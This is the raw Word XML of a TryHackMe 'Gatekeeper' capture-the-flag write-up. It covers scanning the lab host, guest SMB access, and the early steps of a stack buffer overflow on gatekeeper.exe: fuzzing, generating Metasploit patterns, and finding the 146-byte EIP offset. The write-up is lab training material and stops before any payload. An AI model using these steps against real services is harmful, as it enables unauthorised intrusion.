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71C6" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009702B2" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This is </w:t>
      </w:r>
      <w:r w:rsidR="00BD0CD7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>audit for the Try Hack Me system called Gatekeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009702B2" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The link is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009702B2" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="005008CF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/gatekeeper</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009702B2" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009702B2" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009702B2" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IP address: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10.10.198.11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009702B2" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009702B2" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start with a basic Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009702B2" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009702B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rustscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009702B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009702B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009702B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- -A -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009702B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009702B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009702B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009702B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009702B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009702B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> | tee TotalRustscan.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009702B2" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009702B2" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The open ports on the machine is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B93B88" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009702B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31E38838" wp14:editId="49753D33">
            <wp:extent cx="2524477" cy="1114581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B88">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="47688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88" w:rsidRDefault="00B93B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="52152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88" w:rsidRDefault="00B93B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="41402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88" w:rsidRDefault="00B93B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="430403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2B2" w:rsidRDefault="009702B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B93B88" w:rsidRDefault="00B93B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>From the scans we established that the OS is Windows 7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B93B88" w:rsidRDefault="00B93B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The hostname is confirmed as “gatekeeper”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B93B88" w:rsidRDefault="00B93B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>There is a number of open ports and services. For now</w:t>
      </w:r>
      <w:r w:rsidR="00BD0CD7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we will look at the SMB services. It supports guest logon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B93B88" w:rsidRDefault="00B93B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="34747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88" w:rsidRDefault="00B93B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B93B88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="784358E0" wp14:editId="63B76532">
            <wp:extent cx="5731510" cy="153416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88" w:rsidRDefault="00B93B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B204D6" w:rsidRDefault="00B93B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We can connect to the user shares</w:t>
      </w:r>
      <w:r w:rsidR="00B204D6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Inside we find a couple of items:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B93B88" w:rsidRDefault="00B93B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B93B88" w:rsidRDefault="00B93B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="182372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88" w:rsidRDefault="00B204D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E1741B8" wp14:editId="0D411287">
            <wp:extent cx="5731510" cy="358013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D6" w:rsidRDefault="00B204D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B204D6" w:rsidRDefault="00B204D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We found a gatekeeper.exe file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703B13" w:rsidRDefault="00B204D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The “Default” directory ha</w:t>
      </w:r>
      <w:r w:rsidR="00703B13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s a number of files and folders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703B13" w:rsidRDefault="00703B13">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We copied gatekeeper.exe to your windows lab.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703B13" w:rsidRDefault="00703B13">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">However when we try </w:t>
      </w:r>
      <w:r w:rsidR="00BD0CD7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">run it </w:t>
      </w:r>
      <w:r w:rsidR="00BD0CD7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following error, missing DLL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703B13" w:rsidRDefault="00703B13">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4763165" cy="1857634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13" w:rsidRDefault="00703B13">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B204D6" w:rsidRDefault="00B204D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The gatekeeper runs with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c++</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We had to add the two required modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="35242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510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This allowed us to start gatekeeper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Looking back at the initial port scans, it seems that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> was confused about port 31337</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We tried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nc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localwindowsIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 31337 connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It connected to the </w:t>
      </w:r>
      <w:r w:rsidR="00BD0CD7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gatekeeper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It seems the program will</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> repeat any input received, bytes, and reply with the “Hello” + input bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7510">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16F5F38F" wp14:editId="54EE960D">
            <wp:extent cx="3648584" cy="17909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510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7510">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B60A860" wp14:editId="351373C2">
            <wp:extent cx="5731510" cy="28257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510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We will attempt a buffer overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For this we will run gatekeep.exe inside Immunity Debugger.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I will create 5000 “A” and send it to the program with python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7510">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC7510">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC7510">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"A" * 5000)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This crashes the application, as seen in Immunity Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FBCA34C" wp14:editId="62D18382">
            <wp:extent cx="2314898" cy="2610214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510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All the buffers overflowed and the EIP is filled with “A”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We will create a pattern to establish the overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf-pattern_create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7510">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56AE193D" wp14:editId="7F10CCEC">
            <wp:extent cx="5731510" cy="22339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510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC7510" w:rsidRDefault="00EC7510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sending this pattern to </w:t>
      </w:r>
      <w:r w:rsidR="009105CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gatekeeper resulted in overflow EIP of 39654138</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009105CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2562583" cy="2486372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5CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009105CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We will back search this patter to find the byte overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009105CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf-pattern_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l 5000 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 39654138</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009105CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An exact match was found at 146 bytes</w:t>
